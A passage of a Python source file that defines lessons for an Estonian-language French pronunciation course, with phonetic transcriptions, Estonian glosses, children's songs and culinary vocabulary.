v.a. siis kui järgneb täishäälik või teine **m** / **n**.
""",ref="un")
Reeglid.parse_words(NomPropre,u"""
Verdun [vär'dÖ~] : -
""")
Reeglid.parse_words(Nom,u"""
le parfum [par'fÖ~] : hea lõhn v. maitse
""")
Reeglid.parse_words(Adjectif,u"""
parfumé [parfü'mee] | parfumée [parfü'mee] : lõhnastatud
brun [brÖ~] | brune [brün] : pruun
# aucun [o'kÖ~] | aucune [o'kün] : mitte üks
""")
#~ chacun [ža'kÖ~] | chacun [ža'kün] : igaüks
Reeglid.add_lesson(u"in & im",
u"""
**in** ja **im** hääldatakse **[Ä~]**,
v.a. siis kui järgneb täishäälik või teine **n** või **m**.
Vaata ka [ref ain].
""",ref="in")
Reeglid.parse_words(None,u"""
la information [Ä~formasjO~] : informatsioon
le imperméable [Ä~pärme'aablə] : vihmajope
la image [i'maaž] : pilt
le vin [vÄ~]: vein
le bassin [ba'sÄ~] : bassein
le dessin [de'sÄ~] : joonistus
je dessine [de'sin] : ma joonistan
""")
Reeglid.parse_words(Adjectif,u"""
inutile (mf) [inü'til] : kasutu
""")
#~ Reeglid.add_lesson(u"ain, aim, ein, eim",
#~ u"""
#~ Kui **a** või **e** on **in**/**im** ees,
#~ siis see sulab nendega kokku ja kaob ära.
#~ """,ref="ain")
#~ Reeglid.parse_words(Nom,u"""
#~ le pain [pÄ~] : sai | leib
#~ le gain [gÄ~] : kasu
#~ la main [mÄ~] : käsi
#~ la faim [fÄ~] : nälg
#~ """)
#~ Reeglid.parse_words(NomPropre,u"""
#~ Reims [rÄ~s] : (linn)
#~ """)
Reeglid.add_lesson(u"ain & aim",
u"""
**ain** ja **aim** hääldatakse **[Ä~]**. **a** ühineb **in**/**im**-ga ja kaob ära.
Sama loogika nagu [ref ein].
""",ref="ain")
Reeglid.parse_words(Nom,u"""
le pain [pÄ~] : sai | leib
# le gain [gÄ~] : kasu
la main [mÄ~] : käsi
la faim [fÄ~] : nälg
""")
Reeglid.add_lesson(u"ein & eim",
u"""
**ein** ja **eim** hääldatakse **[Ä~]**. **e** ühineb **in**/**im**-ga ja kaob ära.
Sama loogika nagu [ref ain].
""",ref="ein")
Reeglid.parse_words(Nom,u"""
le rein [rÄ~] : neer (anat.)
la reine [rään] : kuninganna
""")
Reeglid.parse_words(NomPropre,u"""
Reims [rÄ~s] : (linn)
""")
Reeglid.add_lesson(u"ien",
u"""
**ien** hääldatakse **[jÄ~]** v.a. siis kui järgneb teine **n**.
""",ref="ien")
# Example words for the "ien" lesson.
# Fix: the lesson above states that "ien" is pronounced [jÄ~]; these
# transcriptions used [iÄ~], contradicting both the rule and the file's own
# "la chienne [šjän]" / "le chien [šjÄ~]" elsewhere.
Reeglid.parse_words(None,u"""
le chien [šjÄ~] : koer
la chienne [šjän] : emakoer
""")
Reeglid.parse_words(Autre,u"""
bien [bjÄ~] : hästi
rien [rjÄ~] : ei midagi
""")
Reeglid.add_lesson(u"oin",
u"""
**oin** hääldatakse **[wÄ~]**.
Reegel [ref oi] ei kehti sel juhul, sest *i* sulab *n*-iga kokku.
""",ref="oin")
Reeglid.parse_words(None,u"""
# le coin [kwÄ~] : nurk
le point [pwÄ~] : punkt
""")
Reeglid.parse_words(Autre,u"""
besoin [bə'zwÄ~] : vaja
# loin [lwÄ~] : kauge
""")
Reeglid.add_lesson(u"c", u"""
**c** hääldatakse **[s]** siis
kui järgneb **e**, **i** või **y**,
ja muidu **[k]** (ja mitte kunagi **[tš]**).
Sõna lõpus kaob mõnikord ära.
""",ref="c")
Reeglid.parse_words(None,u"""
la casserole [kas'roll] : kastrul
la confiture [kO~fi'tüür] : moos | keedis
la cuisse [kwis] : reis | kints
le certificat [särtifi'ka] : tsertifikaat
la cire [siir] : vaha
le centre ['sA~trə] : keskus
le cygne ['sinjə] : luik
la classe [klas] : klass
le tabac [ta'ba] : tubak
""")
Reeglid.parse_words(NomPropre,u"""
octobre [ok'tOObrə] : oktoober
Marc [mark] : Markus
""")
Reeglid.parse_words(Numerique,u"""
cinq [sÄ~k] : viis
""")
if FULL_CONTENT:
Reeglid.parse_words(None,u"""
le câble ['kaablə] : kaabel
la cible ['siiblə] : märklaud
la comédie [kome'dii] : komöödia
le comble ['kO~blə] : kõrgeim v. ülim aste
la cure [küür] : kuur
la croûte [krut] : koorik
un acacia [akasj'a] : akaatsia (põõsas)
""")
Reeglid.add_lesson(u"h", u"""
**h** ei hääldata kunagi.
""",ref="h")
#~ (Vaata ka [ref haspire])
Reeglid.parse_words(Nom,u"""
le hélicoptère [elikop'täär] : helikopter
le hôtel [o'täl] : hotell
le autel [o'täl] : altar
""")
if FULL_CONTENT:
Reeglid.add_lesson(u"h aspiré", u"""
Kuigi **h** ei hääldata kunagi ([vt. [ref h]]),
on neid kaks tüüpi: «h muet» (tumm h)
ja «h aspiré» (sisse hingatud h).
Viimane tähistatakse sõnaraamatutes tärniga (*).
Erinevus koosneb selles, kuidas eesolev sõna liitub nendega.
""",ref="haspire")
Reeglid.parse_words(Nom,u"""
le hélicoptère [elikop'täär] : helikopter
le hôtel [o'täl] : hotell
le homme [Om] : mees
le *haricot [ari'ko] : uba
le *héros [e'ro] : kangelane
le *hibou [i'bu] : öökull
""")
Reeglid.add_lesson(u"ch", u"""
**ch** hääldatakse tavaliselt **[š]** ja mõnikord (kreeka päritolu sõnades) **[k]**,
ja mitte kunagi **[tš]**.
""",ref="ch")
Reeglid.parse_words(Nom,u"""
le chat [ša] : kass
la biche [biš] : emahirv
le chœur [kÖÖr] : koor (laulu-)
le psychologue [psiko'lOOgə] : psüholoog
""")
"""
la chèvre ['šäävrə] : kits
la chambre [šA~mbrə] : tuba
le parachute [para'šüt] : langevari
le Christe [krist] : Kristus
une chope [žOp] : õlu
le chien [šjÄ~] : koer
un achat [a'ša] : ost
"""
Reeglid.add_lesson(u"ç", u"""
**ç** hääldatakse alati **[s]**.
""",ref="cedille")
# Example words for the "ç" lesson.
# Fix: "la leçon [lə~sO~]" had a stray nasal tilde on the schwa; the scheme
# elsewhere uses a stress mark there (cf. "le maçon [ma'sO~]", "le reçu [rə'sü]").
Reeglid.parse_words(None,u"""
la leçon [lə'sO~]: lektsioon
# la rançon [rA~sO~]: lunaraha
le reçu [rə'sü] : kviitung
le maçon [ma'sO~] : müürsepp
""")
Reeglid.add_lesson(u"-er & -ez",
u"""
**-er** ja **-ez** sõna lõpus hääldatakse **[ee]**.
""",ref="er")
Reeglid.parse_words(None,u"""
manger [mA~'žee] : sööma
vous mangez [mA~'žee] : te sööte
aimer [ä'mee] : armastama
vous aimez [ä'mee] : te armastate
""")
Reeglid.add_lesson(u"-et",
u"""
**-et** sõna lõpus hääldatakse **[ä]**.
""",ref="et")
Reeglid.parse_words(None,u"""
le fouet [fu'ä] : vispel
le fumet [fü'mä] : hea lõhn (nt. veini, liha kohta)
""")
Reeglid.add_lesson(u"-ent",
u"""
**-ent** sõna lõpus hääldatakse **[ə]** siis kui tegemist
on *tegusõna kolmada mitmuse vormiga*.
Muidu kehtib reegel [ref en] (hääldatakse **[A~]**).
""",ref="ent")
Reeglid.parse_words(None,u"""
ils couvent [il 'kuuvə] : nad munevad
le couvent [ku'vA~] : klooster
souvent [su'vA~] : tihti
""")
Reeglid.add_lesson(u"j",
u"""
**j** hääldatakse **[ž]** (ja mitte [dž]).
""",ref="j")
Reeglid.parse_words(None,u"""
majeur [mažÖÖr] : suurem
je [žə] : mina
jamais [ža'mä] : mitte iialgi
""")
Reeglid.parse_words(NomPropre,u"""
Josephe [žo'zäf] : Joosep
""")
Reeglid.add_lesson(u"g",
u"""
**g** hääldatakse **[g]** kui järgneb **a**, **o**, **u**
või kaashäälik, aga **[ž]** kui järgneb **e**, **i** või **y**.
""",ref="g")
# Example words for the "g" lesson.
# Fix: standard French spelling is "girafe" (one f), not "giraffe".
Reeglid.parse_words(None,u"""
le gorille [go'rijə] : gorilla
la gazelle [ga'zäl] : gasell
la girafe [ži'raf] : kaelkirjak
# le gymnase [žim'naaz] : gümnaasium
# le juge [žüüž] : kohtunik
# la géologie [žeolo'žii] : geoloogia
général [žene'ral] : üldine
le général [žene'ral] : generaal
""")
Reeglid.add_lesson(u"gu",
u"""
**gu** hääldatakse **[g]** (s.t. **u** kaob ära)
siis kui järgneb **e**, **i** või **y**.
""",ref="gu")
Reeglid.parse_words(None,u"""
le guépard [ge'paar] : gepard
le guide [giid] : reisijuht
la guitare [gi'taar] : kitarr
la guerre [gäär] : sõda
Guy [gi] : (eesnimi)
Gustave [güs'taav] : (eesnimi)
aigu [ä'gü] : terav, ...
""")
Reeglid.add_lesson(u"gn", u"""
**gn** hääldatakse **[nj]**.
""",ref="gn")
# Example words for the "gn" lesson.
# Fixes: gender tag "(mf)" as used everywhere else in this file (e.g.
# "neutre (mf)", "inutile (mf)"), and Estonian spelling "suurepärane".
Reeglid.parse_words(None,u"""
magnifique (mf) [manji'fik] : suurepärane
le cognac [kon'jak] : konjak
le signal [sin'jal] : signaal
""")
#~ Reeglid.parse_words(Verbe,u"""
#~ soigner [swan'jee] : ravima | hoolitsema
#~ """)
Reeglid.parse_words(NomGeographique,u"""
Avignon [avin'jO~] : -
""")
#~ """
#~ la ligne ['linjə] : liin | rida
#~ le signe ['sinjə] : märk
#~ la besogne [bə'zOnjə] : töö | tegu | ülesanne
#~ """
Reeglid.add_lesson(u'il',
u"""
**il** (sõna lõpus ja kaashääliku taga)
hääldatakse kas **[i]** või **[il]**.
""",ref="il")
Reeglid.parse_words(None,u"""
il [il] : tema
le persil [pär'sil] : petersell
le outil [u'ti] : tööriist
# le fusil [fü'zi] : püss
subtil (m) [süp'til] : peen, subtiilne
gentil (m) [žA~'ti] : armas
# le exil [äg'zil] : eksiil
""")
Reeglid.add_lesson(u"ill", u"""
**ill** hääldatakse **[iij]** või **[ij]**.
Erandid on sõnad *ville* ja *mille*.
""",ref="ill")
Reeglid.parse_words(None,u"""
# la bille [biije] : kuul
la anguille [A~'giije] : angerjas
la myrtille [mir'tiije] : mustikas
la famille [fa'miije] : perekond
la cuillère [kwi'jäär] : lusikas
# le pillage [pij'aaž] : rüüstamine
""")
Reeglid.parse_words(None,u"""
la ville [vil] : linn
mille [mil] : tuhat
le million [mil'jO~] : miljon
""")
#~ tranquille [trA~kiije] : rahulik
Reeglid.add_lesson(u"ail",
u"""
**ail** hääldatakse **[aj]** :
siin ei kehti reegel [ref ai], sest *i* sulab *l*-iga kokku.
""",ref="ail")
Reeglid.parse_words(Nom,u"""
l'ail (m) [aj] : küüslauk
le travail [tra'vaj] : töö
le détail [detaj] : detail
# l'aile (f) [ääl] : tiib
""")
# Fix: per the "ail" rule in this file (-ail(les) = [aj]), and matching the
# transcription "Versailles [ver'saj]" used in the city list later on.
Reeglid.parse_words(NomGeographique,u"""
Versailles [ver'saj] : Versailles
""")
Reeglid.add_lesson(u'eil',
u"""
**eil** ja **eille** hääldatakse **[eij]**.
""",ref="eil")
Reeglid.parse_words(None,u"""
le réveil [re'veij] : äratuskell
le soleil [so'leij] : päike
la merveille [mär'veij] : ime
merveilleux [märvei'jöö] : imeline
# le réveillon [revei'jO~] : vana-aasta õhtu söök
la groseille [gro'zeij] : sõstar (punane v. valge) | tikker
# vieille (f) [vjeij] : vana
# la veille [veij] : pühalaupäev
""")
Reeglid.add_lesson(u"ueil",u"""
**ueil** hääldatakse **[Öj]**.
""",ref="ueil")
Reeglid.parse_words(None,u"""
le accueil [a'kÖj] : vastuvõtt
le orgueil [Or'gÖj] : ülbus
""")
Reeglid.add_lesson(u"euil",
u"""
**euil** hääldatakse **[Öj]**.
""",ref="euil")
Reeglid.parse_words(None,u"""
le chevreuil [šəv'rÖj] : metskits
le écureuil [ekü'rÖj] : orav
""")
if False:
Pronounciation.add_lesson(u"[äär]", u"""
Kui kuuled [äär], siis kirjutad kas **ère**, **aire**, **ère**, **erre** või **er**.
""")
Pronounciation.parse_words(None,u"""
le père [päär] : isa
la paire [päär] : paar
le maire [määr] : linnapea
la mère [määr] : ema
la mer [määr] : meri
amer (m) [a'määr] : kibe
la bière [bjäär] : õlu
la pierre [pjäär] : kivi
la terre [täär] : muld
""")
if FULL_CONTENT:
Eestlastele.add_lesson(u"v ja f", u"""
Ettevaatust, **v** ei ole **f**!
""")
Eestlastele.parse_words(None,u"""
vous [vu] : teie
fou [fu] : hull
# vous êtes fous [vu'zäät fu] : te olete lollid
je veux [žə vöö] : ma tahan
le feu [föö] : tuli
la fille [fiij] : tüdruk | tütar
la vie [vii] : elu
la fin [fÄ~] : lõpp
le vin [vÄ~] : vein
""")
Eestlastele.add_lesson("gn ja ng", """
Ettevaatust, **gn** ei ole **ng**!
""")
Eestlastele.parse_words(Nom,u"""
le ange [A~ž] : ingel
le agneau [an'joo] : tall
le singe [sÄ~ž] : ahv
le signe ['sinjə] : märk
le linge [lÄ~ž] : pesu
la ligne ['linjə] : liin | rida
le songe [sO~ž] : unenägu
la besogne [bə'zOnjə] : ülesanne | kohustus
""")
Eestlastele.add_lesson(u"Sugu on oluline", u"""
Siin mõned näited, et sugu pole sugugi ebatähtis.
""")
Eestlastele.parse_words(Nom,u"""
le père [päär] : isa
la paire [päär] : paar
le maire [määr] : linnapea
la mère [määr] : ema
le tour [tuur] : tiir
la tour [tuur] : torn
le mur [müür] : sein | müür
la mûre [müür] : põldmari
le cours [kuur] : kursus | tund (koolis)
la cour [kuur] : õu, hoov | kohus
""")
#~ Eestlastele.parse_words(None,u"""
#~ court (m) [kuur] : lühike
#~ """)
Eestlastele.add_lesson(u"Ära aja segamini!", u"""
Mõned harjutused veel...
""")
Eestlastele.parse_words(Autre,u"""
ces ingrédients [säz Ä~gre'djA~] : need koostisained
c'est un crétin [sätÖ~ kre'tÄ~] : ta on kretiin
je dors [žə dOOr] : ma magan
j'ai tort [žee tOOr] : ma eksin
""")
Eestlastele.parse_words(Nom,u"""
la jambe [žA~mbə] : jalg
la chambre [šA~mbrə] : tuba
le agent [la' žA~] : agent
le chant [lə šA~] : laul
les gens [žA~] : inimesed, rahvas
les chants [šA~] : laulud
""")
if False:
Eestlastele.parse_words(None,u"""
le loup [lu] : hunt
la loupe [lup] : luup
la joue [žuu] : põsk
le jour [žuur] : päev
mou (m) [mu] : pehme
""")
#~ Reeglid.parse_words(NomPropre,u"""
#~ Winnetou [winə'tu] : (isegi maailmakuulsa apatši pealiku nime hääldavad prantslased valesti)
#~ """)
General.add_lesson(u"Tervitused", u"""
""")
# Greetings vocabulary.
# Fix: "Je m'appelle" begins with [ž] (French j = [ž] per this file's own
# "j" lesson and "je [žə]"); it was transcribed with [z].
General.parse_words(Autre,u"""
salut [sa'lü] : tervist
bonjour [bO~'žuur] : tere | head päeva | tere hommikust
bonsoir [bO~'swaar] : head õhtut
bonne nuit [bOnə 'nwi] : head ööd
au revoir [orə'vwaar] : nägemiseni
Monsieur [məs'jöö] : härra
Madame [ma'dam] : proua
Mademoiselle [madəmwa'zel] : preili
Comment t'appelles-tu? [ko'mA~ ta'päl tü] : Kuidas on sinu nimi?
Je m'appelle... [žə ma'päl] : Minu nimi on...
Comment vas-tu? [ko'mA~va'tü] : Kuidas sul läheb?
s'il vous plaît [silvu'plä] : palun (Teid)
s'il te plaît [siltə'plä] : palun (Sind)
merci [mer'si] : aitäh
merci beaucoup [mer'si bo'ku] : tänan väga
oui [wi] : jah
non [nO~] : ei
bon appétit [bOnappe'ti] : head isu
j'ai faim [žee fÄ~] : mul on kõht tühi
j'ai soif [žee swaf] : mul on janu
je suis fatigué [žə swi fati'gee] : ma olen väsinud
""")
if FULL_CONTENT:
General.add_lesson(u"Prantsuse automargid",columns=[FR,PRON],show_headers=False)
General.parse_words(NomPropre,u"""
Peugeot [pö'žo] : -
Citroën [sitro'än] : -
Renault [re'noo] : -
""")
General.add_lesson(u"Prantsuse eesnimed", u"""
""")
General.parse_words(NomPropre,u"""
Albert [al'bäär] : -
André [A~'dree] : Andre
Anne [anə] : Anne
Bernard [bär'naar] : -
Catherine [kat'rin] : Katrin
Charles [šarl] : Karl
François [frA~'swa] : -
Isabelle [iza'bäl] : Isabel
Jacques [žaak] : Jaak
Jean [žA~] : Jaan
Luc [lük] : Luukas
Marie [ma'rii] : Maria
Paul [pOl] : Paul
Philippe [fi'lip] : Filip
Pierre [pjäär] : Peeter
""")
General.add_lesson(u"Taluloomad", u"""
""")
General.parse_words(Nom,u"""
la chèvre ['šäävrə] : kits
la brebis [brə'bis] : lammas
le porc [pOOr] : siga
le cochon [ko'šO~] : siga
le cheval [šə'val] : hobune
la vache [vaš] : lehm
le taureau [to'roo] : pull
le veau [voo] : vasikas
le bœuf [bÖff] : härg
""")
General.add_lesson(u"Metsloomad", u"""
""")
General.parse_words(Nom,u"""
la chasse [šas] : jaht
le chasseur [ša'sÖÖr] : jahimees
le chevreuil [šəv'rÖj] : metskits
le cerf [säär] : hirv
la biche [biš] : emahirv
un élan [e'lA~] : põder
le lapin [la'pÄ~] : küülik
le lièvre [li'äävrə] : jänes
le renard [rə'naar] : rebane
un écureuil [ekü'rÖj] : orav
la souris [su'ri] : hiir
le blaireau [blä'roo] : mäger | habemeajamispintsel
le *hérisson [eri'sO~] : siil
la hermine [är'min] : hermeliin
la martre ['martrə] : nugis
la belette [bə'lät] : nirk
le loup [lu] : hunt
un ours [urs] : karu
le lynx [lÄ~ks] : ilves
le sanglier [sA~gli'e] : metssiga
le marcassin [marka'sÄ~] : metsseapõrsas
""")
# belette : nirk
if HAS_FUN and FULL_CONTENT:
Fun.add_lesson(u"Au clair de la lune", u"""
| Au clair de la lune,
| Mon ami Pierrot,
| Prête-moi ta plume
| Pour écrire un mot.
| Ma chandelle est morte,
| Je n'ai plus de feu ;
| Ouvre-moi ta porte,
| Pour l'amour de Dieu.
""")
Fun.parse_words(None,u"""
le clair de lune : kuuvalgus
un ami : sõber
""")
Fun.parse_words(Verbe,u"""
prêter : laenama
écrire : kirjutama
ouvrir : avama
""")
Fun.parse_words(None,u"""
la plume : sulg
""")
Fun.parse_words(Verbe,u"""
""")
Fun.parse_words(None,u"""
le mot : sõna
la chandelle : küünlalamp
""")
Fun.parse_words(Adjectif,u"""
mort | morte (adj.) : surnud
""")
Fun.parse_words(None,u"""
le feu [föö] : tuli
la porte [pOrt] : uks
un amour : armastus
Dieu : Jumal
""")
if HAS_FUN:
Fun.add_lesson(u"Sur le pont d'Avignon", u"""
| Sur le pont d'Avignon,
| on y danse, on y danse ;
| Sur le pont d’Avignon,
| on y danse tous en rond !
|
| Les beaux messieurs font comme ça,
| et puis encore comme ça.
|
| Les belles dames font comme ça,
| et puis encore comme ça.
|
| Les cordonniers font comme ça,
| et puis encore comme ça.
""")
# Vocabulary for "Sur le pont d'Avignon".
# Fix: "comme ci" is pronounced [kOm'si]; it was transcribed identically to
# "comme ça [kOm'sa]" on the next line (copy-paste slip).
Fun.parse_words(None,u"""
sur : peal
le pont [pO~] : sild
on danse tous ['dA~sə] : me kõik tantsime
en rond : ringis
les beaux messieurs : ilusad härrad
les belles dames : ilusad daamid
ils font [il fO~] : nad teevad
comme ci [kOm'si] : niimoodi
comme ça [kOm'sa] : naamoodi
et puis encore [e pwi A~'kOOr] : ja siis veel
le cordonnier [kOrdon'jee] : kingsepp
""")
if HAS_FUN and FULL_CONTENT:
Fun.add_lesson(u"J'ai du bon tabac", u"""
| J'ai du bon tabac dans ma tabatière,
| J'ai du bon tabac, tu n'en auras pas.
| J'en ai du fin et du bien râpé
| Mais, ce n'est pas pour ton vilain nez
| J'ai du bon tabac dans ma tabatière
| J'ai du bon tabac, tu n'en auras pas
""")
if FULL_CONTENT:
General.add_lesson(u"Linnud", u"""
""")
# Birds vocabulary.
# Fix: French spelling is "dindon" (the transcription [dÄ~dO~] already
# matched "dindon", not "dindeon").
General.parse_words(Nom,u"""
le oiseau [wa'zoo] : lind
la poule [pul] : kana
le poulet [pu'lä] : tibu | kanapoeg
la oie [wa] : hani
le dindon [dÄ~dO~] : kalkun
la dinde [dÄ~də] : emakalkun
le pigeon [pi'žO~] : tuvi
""")
Kokadele.add_lesson(u"Katame lauda!", u"""
""")
Kokadele.parse_words(Nom,u"""
la table ['taablə] : laud
la chaise [šääz] : tool
le couteau [ku'too] : nuga
la fourchette [fur'šet] : kahvel
la cuillère [kwi'jäär] : lusikas
les couverts [ku'väär] : noad-kahvlid
la assiette [as'jät] : taldrik
le bol [bOl] : joogikauss
le verre [väär] : klaas
la tasse [tas] : tass
le plat [pla] : kauss
""")
Kokadele.add_lesson(u"Joogid", u"""""")
Kokadele.parse_words(Nom,u"""
la boisson [bwa'sO~] : jook
la bière [bjäär] : õlu
la eau [oo] : vesi
le jus [žu] : mahl
le café [ka'fee] : kohv
le thé [tee] : tee
le vin rouge [vÄ~ 'ruuz]: punane vein
le vin blanc [vÄ~ 'blA~]: valge vein
le vin rosé [vÄ~ ro'zee] : roosa vein
le cidre ['siidrə] : siider
la région [rež'jO~] : regioon, ala
le terroir [ter'waar] : geograafiline veinirühm
la appellation d'origine contrôlée (AOC) [apela'sjO~ dori'žin kO~trO'lee] : kontrollitud päritolumaa nimetus
la bavaroise [bavaru'aaz] : jook teest, piimast ja liköörist
""")
Kokadele.add_lesson(u"Menüü", intro=u"""""")
Kokadele.parse_words(Nom,u"""
le plat [pla] : roog
le plat du jour [pla dü žuur] : päevapraad
le *hors d'œuvre [OOr 'dÖÖvrə] : eelroog
le dessert [des'säär] : magustoit
""")
Kokadele.add_lesson(u"Supid", u"""
""")
Kokadele.parse_words(Nom,u"""
la soupe [sup] : supp
le potage [po'taaž] : juurviljasupp
le potage purée [po'taažə pü'ree] : püreesupp
le velouté [vəlu'tee] : koorene püreesupp
le velouté Dubarry [vəlu'tee düba'ri] : koorene püreesupp lillkapsaga
le bouillon [bui'jO~] : puljong
le consommé [kO~som'mee] : selge puljong
le consommé de volaille [kO~som'mee də vo'lajə] : linnulihast puljong
le consommé de gibier [kO~som'mee də žib'jee] : ulukilihast puljong
le consommé de poisson [kO~som'mee də pwa'sO~] : kala puljong
le consommé double [kO~som'mee 'duublə] : kahekordne puljong
#rammuleem?
""")
Kokadele.add_lesson(u"Liha", u"""
""")
Kokadele.parse_words(Nom,u"""
la viande [vjA~də] : liha
la volaille [vo'lajə] : linnuliha
le poulet [pu'lä] : kana
le gibier [žibiee] : jahiloomad
la boucherie [bušə'rii] : lihakauplus, lihakarn
le lard [laar] : pekk
le jambon [žA~'bO~] : sink
la saucisse [soo'sis] : vorst
la graisse [gräs] : rasv
le os [os] : kont
la côte [koot] : ribi
le dos [do] : selg
la cuisse [kwis] : kints
la langue [lA~gə] : keel
le foie [fwa] : maks
les tripes [trip] : soolestik
le cœur [kÖÖr] : süda
le rognon [ron'jO~] : neer (kulin.)
la cervelle [ser'vell] : aju
les abats [a'ba] : subproduktid (maks,süda, neerud, keel, jalad)
""")
Kokadele.add_lesson(u"Kala", u"""
""")
Kokadele.parse_words(Nom,u"""
le poisson [pwa'sO~] : kala
les crustacés [krüsta'see] : karploomad | koorikloomad
le brochet [bro'šä] : haug
la anguille [A~'giijə] : angerjas
la perche [pärš] : ahven
le *hareng [ar'A~] : heeringas
le sprat [sprat] : sprot
le thon [tO~] : tuunikala
le requin [rə'kÄ~] : haikala
""")
Kokadele.add_lesson(u"Liharoad", u"""""")
Kokadele.parse_words(Nom,u"""
la escalope [eska'lOp] : eskalopp, šnitsel
le ragoût [ra'gu] : raguu
la roulade [ru'laadə] : rulaad
la paupiette [pop'jät] : liharull
le aspic [as'pik] : sült
le filet [fi'lä] : filee | võrk
le bifteck [bif'täk] : biifsteek
la brochette [bro'šät] : lihavarras, šašlõk
les attereaux [attə'roo] : fritüüris praetud varras, paneeritud šašlõk
la côtelette [kot'lät] : naturaalne kotlet
la côtelette de porc [kot'lät də pOOr] : sealiha kotlet
la noisette de porc [nwa'zät də pOOr] : filee sealiha
le goulasch [gu'laš] : guljašš
le *hachis [ha'ši] : hakkliha
la boulette [bu'lett] : lihapall
le tournedos [turnə'do] : veise sisefilee portsjon toode
la entrecôte [A~trə'koot] : antrekoot
le Chateaubriand [šatobri'A~] : praetud liharoog
le carré d'agneau [ka'ree dan'joo] : praetud tallerind
la poitrine d'agneau farcie [pwa'trin dan'joo far'sii] : täidetud tallerind
le cœur de filet [kÖÖr də fi'lä] : veise sisefilee
le filet mignon [fi'lä min'jO~] : veise sisefilee portsjon toode
le filet médaillon [fi'lä meda'jO~] : medaljon (veise sisefilee portsjon toode)
le médaillon de veau [meda'jO~ də'voo] : vasika medaljon
le bœuf bourguignon [bÖff burgin'jO~] : härjapraad burgundia veiniga
le bœuf à la tartare [bÖff a la tar'taar] : väiketükiline toode sisefileest
le bœuf à la Strogonov [bÖff a la strogo'nov] : böfstrogonov
le sauté de bœuf à la suédoise [so'tee də bÖff a la süee'dwaazə] : klopsid
le sauté de veau [so'tee də voo] : pajaroog vasikalihast
la selle de mouton [säl də mu'tO~] : lamba (talle) sadul
""")
Kokadele.add_lesson(u"Road", intro=u"""""")
Kokadele.parse_words(Nom,u"""
la purée [pü'ree] : püree
le œuf [Öf] : muna
les œufs brouillés [öö brui'jee] : omlett
les œufs pochés [öö po'šee] : ilma kooreta keedetud muna
le gratin [gra'tÄ~] : gratään (ahjus üleküpsetatud roog)
le gratin dauphinois [gra'tÄ~ dofinw'a] : (tuntud retsept)
le gratin savoyard [gra'tÄ~ savwa'jaar] : (juustuga gratin dauphinois)
le soufflé [suff'lee] : suflee
la quiche lorraine [kiš lo'rään] : quiche
la pâte brisée [paat bri'zee] : (Mürbeteig, shortcrust pastry)
la tourte [turt] : (ingl. *pie*)
la fondue [fO~'düü] : fondüü
le fumet [fü'mä] : hea lõhn (nt. veini, liha kohta)
le pâté [pa'tee] : pasteet
le pâté en croûte [pa'tee A~'krut] : küpsetatud taignas pasteet
le pâté en terrine [pa'tee A~ter'rin] : küpsetatud pasteet kausis
la galantine [galA~'tin] : galantiin
le cassoulet [kasu'lä] : Languedoc'ist pärit ühepajatoit ubadest ja lihast, mida küpsetatakse mitu tundi madala temperatuuriga ahjus.
le pot-au-feu [poto'föö] : ühepajatoit
""")
Kokadele.add_lesson(u"Juust", u"""""")
Kokadele.parse_words(None,u"""
le fromage [fro'maaž] : juust
la caillebotte [kajə'bott] : (kodujuust)
la raclette [rak'lett] : kuumaga sulatud juust
le Camembert [kamA~'bäär] : (valgehallitusjuust)
le Emmental [emən'taal] : suurte augudega kõva juust
le Rocquefort [rOk'fOOr] : (sinihallitusjuust)
le Gruyère [grüi'jäär] : -
le Edam [e'dam] : -
le Brie [brii] : -
le Parmesan [parmə'zA~] : -
""")
Kokadele.add_lesson(u"Magustoidud", u"""""")
Kokadele.parse_words(Nom,u"""
le dessert [des'säär] : magustoit
la crème [krääm] : koor
la crème fraiche [krääm 'fräš] : rõõsk koor
la crème brûlée [krääm brü'lee] : põletud koor
la crème bavaroise [krääm bavaru'aaz] : muna-piima-seguga kreem želatiiniga
la sauce melba [soos mel'ba] : melba kaste
la sauce vanille [soos va'niijə] : vanillikaste
la sauce caramel [soos kara'mäl] : karamellkaste
la crêpe [kräp] : pannkook
la glace [glass] : jäätis
le sorbet [sor'bä] : jäätis (ilma kooreta)
le parfait [par'fä] : parfee
le gâteau [ga'too] : kook
la gaufre ['goofrə] : vahvel
la tarte [tart] : tort
la compote [kO~'pOt] : kompott
la gelée [žə'lee] : tarretis
la confiture [kO~fi'tüür] : moos | keedis
la mousse [mus] : vaht
la tarte aux prunes [tarto'prün] : ploomikook
la salade de fruits [sa'laad də frü'i] : puuviljasalat
la salade de baies [sa'laad də bä] : marjasalat
le petit-beurre [pəti'bÖÖr]: (kuiv küpsis)
""")
Kokadele.add_lesson(u"Puuviljad", u"""""")
# Fruits vocabulary.
# Fixes: "prune" transcribed [prün] to match "la tarte aux prunes
# [tarto'prün]" earlier in the file; "poire" transcribed with [wa] per this
# file's own "oi" rule (cf. "la passoire [pas'waar]", "la armoire
# [arm'waar]") -- NOTE(review): a few entries elsewhere use [u'aa] for oi;
# confirm the intended scheme.
Kokadele.parse_words(Nom,u"""
le fruit [frü'i] : puuvili
le ananas [ana'na] : ananass
la banane [ba'nan] : banaan
le citron [si'trO~] : sidrun
la orange [o'rA~ž] : apelsin
la pomme [pom] : õun
la poire [pwaar] : pirn
la prune [prün] : ploom
la cerise [sə'riiz] : kirss
la noix [nwa] : pähkel
la noisette [nwa'zett] : sarapuupähkel
""")
Kokadele.add_lesson(u"Marjad", u"""""")
Kokadele.parse_words(Nom,u"""
la baie [bä] : mari
la fraise [frääz] : maasikas
la myrtille [mir'tiijə] : mustikas
la mûre [müür] : põldmari
la groseille [gro'zeijə] : sõstar (punane v. valge) | tikker
le cassis [ka'sis] : mustsõstar
""")
Kokadele.add_lesson(u"Juurviljad", u"""""")
Kokadele.parse_words(Nom,u"""
la légume [le'güm] : juurvili
la pomme de terre [pom də 'täär] : kartul
la tomate [to'mat] : tomat
la carotte [ka'rOt] : porgand
# la betterave []
# le panais
# le radis
# le salsifis
# le cerfeuil
la asperge [as'pärž] : spargel
le épinard [epi'naar] : spinat
le concombre [kO~kO~brə]: kurk
le *haricot [ari'ko] : uba
la salade [sa'laadə] : salat
la endive [A~'diiv] : endiiv
# le chicon [ši'kO~] :
le chou [šu] : kapsas
le chou-fleur [šu 'flÖÖr] : lillkapsas
""")
Kokadele.add_lesson(u"Teraviljad", u"""""")
Kokadele.parse_words(Nom,u"""
le blé [blee] : teravili
la avoine [avu'ann] : kaer
le froment [fro'mA~] : nisu
le sarrasin [sara'zÄ~] : tatar
le blé noir [blee'nwaar] : tatar
le riz [ri] : riis
le seigle ['sääglə] : rukis
le orge ['Oržə] : oder
""")
Kokadele.add_lesson(u"Teraviljatooded", u"""""")
